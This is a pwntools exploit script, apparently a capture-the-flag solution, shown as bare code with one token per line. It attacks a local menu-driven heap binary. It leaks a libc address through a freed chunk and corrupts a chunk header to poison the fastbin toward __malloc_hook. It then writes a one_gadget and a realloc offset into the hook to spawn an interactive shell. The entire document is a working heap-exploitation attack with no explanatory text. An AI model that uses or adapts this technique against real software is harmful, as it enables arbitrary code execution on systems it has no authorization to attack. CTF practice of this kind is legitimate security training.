from
pwn
import
*
context(arch
=
'amd64'
, os
=
'linux'
, log_level
=
'debug'
)
p
=
process(
'./pwn'
)
libc
=
ELF(
'./libc.so.6'
)
elf
=
ELF(
'./pwn'
)
def
add(idx, size, content):
p.sendlineafter(b
'choice?\n'
, b
'1'
)
p.sendlineafter(b
'one?\n'
,
str
(idx).encode())
p.sendlineafter(b
'need?\n'
,
str
(size).encode())
p.sendafter(b
'data\n'
, content)
def
edit(idx, size, content):
p.sendlineafter(b
'choice?\n'
, b
'2'
)
p.sendlineafter(b
'one?\n'
,
str
(idx).encode())
p.sendlineafter(b
'need?\n'
,
str
(size).encode())
p.sendafter(b
'data\n'
, content)
def
delete(idx):
p.sendlineafter(b
'choice?\n'
, b
'3'
)
p.sendlineafter(b
'one?\n'
,
str
(idx).encode())
def
show(idx):
p.sendlineafter(b
'choice?\n'
, b
'4'
)
p.sendlineafter(b
'one?\n'
,
str
(idx).encode())
add(
0
,
0x79
, b
'a'
*
0x78
)
add(
1
,
0x18
, b
'b'
*
0x18
)
delete(
0
)
add(
0
,
0X79
, b
'a'
)
show(
0
)
libc_base
=
u64(p.recvuntil(b
'\x7f'
)[
-
6
:].ljust(
8
, b
'\x00'
))
-
0x3c4b61
print
(
'libc_base = '
+
hex
(libc_base))
add(
2
,
0x68
, b
'c'
*
0x68
)
delete(
2
)
delete(
1
)
target
=
libc_base
+
libc.sym[
'__malloc_hook'
]
-
0x23
add(
1
,
0x18
, b
'b'
*
0x18
+
p64(
0x71
)
+
p64(target))
add(
2
,
0x68
, b
'c'
*
0x68
)
realloc
=
libc_base
+
libc.sym[
'realloc'
]
one_gadget
=
[
0x4527a
,
0xf03a4
,
0xf1247
]
add(
4
,
0x68
, b
'p'
*
11
+
p64(libc_base
+
one_gadget[
0
])
+
p64(realloc
+
8
))
p.sendlineafter(b
'choice?\n'
, b
'1'
)
p.sendlineafter(b
'one?\n'
, b
'0'
)
p.sendlineafter(b
'need?\n'
, b
'100'
)
p.interactive()